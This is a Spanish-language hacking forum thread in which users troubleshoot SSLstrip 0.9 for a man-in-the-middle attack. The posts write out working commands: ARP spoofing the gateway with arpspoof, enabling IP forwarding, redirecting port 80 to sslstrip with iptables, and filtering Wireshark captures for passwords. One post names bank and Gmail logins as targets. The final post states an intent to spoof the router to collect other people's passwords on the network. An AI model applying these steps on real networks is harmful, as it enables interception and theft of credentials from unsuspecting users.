Autor
|
Tema: SSLstrip 0.9 no funciona... (Leído 9,042 veces)
|
|
ps3ps3ps3
Desconectado
Mensajes: 116
|
Yo hago lo mismo que tu,con VirtualBox y no me captura nada.. haber si alguien nos dice algo.
Saludoss.
|
|
|
En línea
|
|
|
|
alpha015
Desconectado
Mensajes: 132
|
Ya me funciona... joder, no me acordaba que al hacer el Mitm tengo que poner la puerta de enlace y no mi ip xD: ifconfig (para ver nuestra interfaz), dhclient <interfaz> (para ver nuestra ip) y arpspoof -i <interfaz> <puertadeenlace>. Con respecto a lo de Virtualbox haces:
configuracion -> red -> adaptador 1 -> habilitar adaptador de red -> NAT adaptador 2 -> habilitar adaptador de red -> adaptador puente -> seleccionar tarjeta de red
Saludos.
Pd.: sslstrip creo que no rompe tu ssl si no el de los otros ordenadores de tu red.
|
|
« Última modificación: 30 Diciembre 2011, 00:59 am por alpha015 »
|
En línea
|
|
|
|
alpha015
Desconectado
Mensajes: 132
|
Por cierto, ¿por qué jamones wireshark solo me captura paquetes ssdp?
|
|
|
En línea
|
|
|
|
ps3ps3ps3
Desconectado
Mensajes: 116
|
Ya me funciona... joder, no me acordaba que al hacer el Mitm tengo que poner la puerta de enlace y no mi ip xD: ifconfig (para ver nuestra interfaz), dhclient <interfaz> (para ver nuestra ip) y arpspoof -i <interfaz> <puertadeenlace>. Con respecto a lo de Virtualbox haces:
configuracion -> red -> adaptador 1 -> habilitar adaptador de red -> NAT adaptador 2 -> habilitar adaptador de red -> adaptador puente -> seleccionar tarjeta de red
Saludos.
Pd.: sslstrip creo que no rompe tu ssl si no el de los otros ordenadores de tu red.
Gracias,( ya tengo VBox configurado )que lio llevo,llevo poco con Linux y en este mundillo... Yo lo que hago es ejecuto 3 terminales en el primero pongo: echo 1 > /proc/sys/net/ipv4/ip_forward En los otros 2,en uno pongo sudo arpspoof -i wlan0 -t 192.168.1.1 192.168.1.3 y en la otra consola al contrario: sudo arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1 En las pantallas se ve que esta haciendo arp,luego en otra consola activo sslstrip y iptables y ya en otra pongo dsniff -i wlan0,y ahora me meto en una pagina https... (desde Vbox claro) o cualquier pagina pero nada,no sale nada,hago algo mal? Gracias
|
|
« Última modificación: 30 Diciembre 2011, 02:50 am por ps3ps3ps3 »
|
En línea
|
|
|
|
alpha015
Desconectado
Mensajes: 132
|
Gracias,( ya tengo VBox configurado )que lio llevo,llevo poco con Linux y en este mundillo... Yo lo que hago es ejecuto 3 terminales en el primero pongo: echo 1 > /proc/sys/net/ipv4/ip_forward En los otros 2,en uno pongo sudo arpspoof -i wlan0 -t 192.168.1.1 192.168.1.3 y en la otra consola al contrario: sudo arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1 En las pantallas se ve que esta haciendo arp,luego en otra consola activo sslstrip y iptables y ya en otra pongo dsniff -i wlan0,y ahora me meto en una pagina https... (desde Vbox claro) o cualquier pagina pero nada,no sale nada,hago algo mal? Gracias Haber... llevas un pollo mental... lo mejor sería que utilizaras 2 ordenadores, atacante y víctima, pero si solo tienes uno pues nada. No necesitan abrir 3 consolas y mucho menos realizar 2 veces el ataque. Acuérdate además de usar la última versión de SSLstrip, la 0.9: En la 1ª consola: sudo echo "1" > /proc/sys/net/ipv4/ip_forward sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 sudo sslstrip -a -l 10000 En la 2ª consola: sudo arpspoof -i wlan0 <puertadeenlace> *wlan0 o la interfaz que tengas. Dsniff no lo controlo, te recomiendo que captures con Wireshark... Por cierto, con mi cuenta no podia redireccionar el tráfico del 80 por falta de permisos asi que lo hago desde root, no se si a ti te dejara... Un saludo.
|
|
« Última modificación: 30 Diciembre 2011, 12:50 pm por alpha015 »
|
En línea
|
|
|
|
ps3ps3ps3
Desconectado
Mensajes: 116
|
Jajaja gracias por tu ayuda hombre,pero no habia que hacer el ataque en ambas direcciones? Router-victima,victima-router? Probare como me dices,ya te cuento. Gracias y Saludos. EDITO: El "problema" esta en que es un maquina virtual la victima?,segun me dijeron es lo mismo que un pc. Ya probe hace tiempo wireshark y si pilla algo pero me registro en un foro https y como no entiendo una @"!!% quiero hacerlo con Dsniff,que creo que se entiende mejor... Saludos.
|
|
« Última modificación: 30 Diciembre 2011, 13:50 pm por ps3ps3ps3 »
|
En línea
|
|
|
|
alpha015
Desconectado
Mensajes: 132
|
Jajaja gracias por tu ayuda hombre,pero no habia que hacer el ataque en ambas direcciones? Router-victima,victima-router? Probare como me dices,ya te cuento. Gracias y Saludos. EDITO: El "problema" esta en que es un maquina virtual la victima?,segun me dijeron es lo mismo que un pc. Ya probe hace tiempo wireshark y si pilla algo pero me registro en un foro https y como no entiendo una @"!!% quiero hacerlo con Dsniff,que creo que se entiende mejor... Saludos. De nada. Haber, el ataque consiste en situarse entre la víctima o víctimas y el router engañándolo y caputarando así todos los paquetes. Sólo hay que realizar un ataque y eso de ambas direcciones que dices no es más que el protocolo tcp/ip al enviar la victima una peticion y esta sea respondida. Efectivamente Virtualbox es como si fuera un ordenador, y con respecto a Wireshark tengo que decir que es muy sencillo de usar. Yo empezé con Ettercap pero como me daba muchos problemas me pasé a Wireshark. Es cierto que SSLstrip te crea un archivo con los datos de acceso interceptados, si los hay, no obstante, en Wireshark filtrando por "http contains pass, Pass, password, etc..." puedes facilmente encontrar las contraseñas de ibanesto o gmail por ejemplo. Te dejo un manual cojonudo: http://cert.inteco.es/cert/Notas_Actualidad/informe_sobre_analisis_trafico_wireshark_20110211?postAction=getLatestInfoSé bueno, un saludo.
|
|
« Última modificación: 30 Diciembre 2011, 21:02 pm por alpha015 »
|
En línea
|
|
|
|
Bl4ckP0i7
Desconectado
Mensajes: 2
|
JOder tios gracias por el arpspoof a solo el router para que lleguen mas contraseñas de la gente conectada.... jijiji a hacer locuras
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
SSLSTRIP
« 1 2 3 »
Hacking
|
BeLGaRioN
|
20
|
14,724
|
9 Diciembre 2011, 11:33 am
por D_pit_88
|
|
|
Youtube se mea en Sslstrip
Hacking
|
beholdthe
|
2
|
3,574
|
30 Diciembre 2011, 15:49 pm
por beholdthe
|
|
|
no me funciona sslstrip
Redes
|
daryo
|
0
|
1,911
|
25 Agosto 2013, 19:48 pm
por daryo
|
|
|
SSLStrip no funciona correctamente
Hacking
|
sakun-ice
|
6
|
11,296
|
25 Junio 2015, 16:32 pm
por Kaxperday
|
|
|
aun funciona SSLStrip
Dudas Generales
|
RedZer
|
5
|
4,010
|
30 Octubre 2014, 22:29 pm
por RedZer
|
|